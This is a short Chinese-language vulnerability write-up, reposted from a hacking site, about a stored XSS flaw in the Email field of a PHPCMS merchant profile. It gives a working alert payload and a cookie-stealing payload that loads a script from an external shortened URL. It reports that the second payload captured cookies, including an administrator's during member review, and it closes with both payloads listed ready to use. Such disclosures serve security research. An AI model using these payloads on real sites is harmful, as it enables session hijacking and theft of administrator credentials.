phpcms某处储存型XSS（demo+本地演示）

文章转载：http://www.myhack58.com/Article/html/3/7/2016/71726.htm

详细说明：

demo+本地演示
存在xss漏洞的地方在商务中心的商家资料的我的资料的Email那里（这句话好绕口。。），属于过滤不严格随便插字符的问题，我直接在Email那里写上

"/><svg onload=alert(/1/)>

可以看到是正确的

然后点击提交可以看到说操作成功

然后来到我们的企业首页查看可以看到成功弹窗

   

再查看下源代码，可以看到是储存型的

本来想去后台查看的，但是无奈demo不提供后台演示，只好本地搭建看看了，本地搭建好了以后来到后台查看是不能直接打后台的，但是管理员审核会员的时候会到会员的企业查看，这个时候可以看到成功弹窗

   

然后继续构造："/><script src=http://t.cn/Rz4Oi2b></script>，提交后看看能不能打cookie

可以看到已经成功打到cookie~

 

 

弹窗Payload：

"/><svg onload=alert(/1/)>

打Cookie的Payload:

"/><script src=http://t.cn/Rz4Oi2b></script>